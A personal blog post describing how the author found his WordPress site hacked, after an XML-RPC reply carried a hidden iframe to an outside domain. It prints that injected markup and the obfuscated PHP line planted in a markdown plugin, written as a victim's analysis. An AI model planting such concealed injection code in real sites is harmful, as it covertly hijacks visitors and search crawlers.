splee.blog

Today I thought I’d give the wordpress iPhone app a try since I’m going to try to blog more frequently in the near future. I was slightly irritated that it didn’t work, but I assumed that there was some kind of bug in the system that was preventing it from working with my blog.

After using my best google-fu I couldn’t find anything that would prevent me from adding the basic settings and so I downloaded a trial version of MarsEdit to see if that also choked on my site.

Unfortunately my hunch was proven correct and I couldn’t make MarsEdit connect to my blog.

Since I’ve written XML-RPC client and server code in the past I fired up TextMate and iPython to see if I could diagnose the problem.

I turned on pdb debugging, set up an xmlrpclib.Server instance and tried to call the demo.sayHello() method which resulted in an instant exception. The data that the server returned worried me immensely:

<iframe src=http://googlerank.info/counter style=display:none></iframe> <script language="JavaScript" type="text/javascript">document.cookie = "ireiw=5;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";</script><?xml version="1.0"?>
<methodResponse>
  <params>
    <param>
      <value>
        <string>Hello!</string>
      </value>
    </param>
  </params>
</methodResponse>

That, my friends, is the result of a hacked WordPress installation. This irked me. A lot. Not only are these bastards not content with flooding every post on my blog with spam comments and trackbacks (which has caused me to turn off comments on my older posts, something I really didn’t want to do), they’ve gone and invaded my server to make themselves a little more money. The only reason I actually found this was because of the invalid markup for the XML-RPC response, had I never tried to use XML-RPC I wouldn’t have seen it for reasons that I’ll explain below.

So, now I had to trawl through my WordPress files to see where this invasion was taking place. I checked my database first which came back clean, followed by my themes and plugins. I hit paydirt in both of these places. One was a simple modification to the footer.php of my K2 theme (which wasn’t active so it didn’t really matter) and one was a not so simple modification to my markdown plugin.

Seaching through the source for “iframe” or “googlerank.info” revealed nothing, but that’s because the spammer had added the string as follows:

if (!isset($_COOKIE["ireiw"])) echo '<if'.'rame src=http://googl'.'erank.info/counter style=display:none'.'></ifra'.'me> <s'.'cr'.'ipt language="JavaScr'.'ipt" '.'type="text/'.'javascript">d'.'ocument.cookie '.'= "ireiw=5;expires=Sun, 0'.'1-Dec-2009 08:00:00 GMT;path='.'/";<'.'/script>';

Assholes. So this hidden iframe would only be shown if a cookie had not already been set for the user, meaning it would only be shown once, as often as they used a different browser, or as often as they cleared their cookies. For this reason I never noticed it on my site’s main pages, but I’ll bet any search spiders saw it every damn time.

I have no idea when this act was perpetrated, nor which exploit they used but I’m mighty pissed. In my opinion this is tantamount to breaking into my house and rummaging around through my shit just to take a jar full of £3.07 worth of change - It feels pointless and violating and I really wish the internet weren’t so anonymous so there was actually some risk of being found out if you’re one of these dirty, low-down fucks who make money by ruining people’s (virtual) reputation.

Now I’m turning off XML-RPC and uninstalling the WordPress iPhone app because I really don’t want to be open to yet more possible exploits. Well done spammers. Another feature of my blogging software that I can’t rely on because you’re all unscrupulous asshats. Bravo.

Update (28 July 08): As Daniel pointed out in the comments to this post, I’m not 100% sure that XML-RPC was to blame for my blog being hacked and blaming it wholly for the issue was simply a case of a slightly irate post very soon after I fixed the issue. In the interest of not spreading FUD I need to clear that up.

Currently I cannot find anything about any current XML-RPC exploits in WordPress 2.6 so if you’re up to date there shouldn’t be any problems.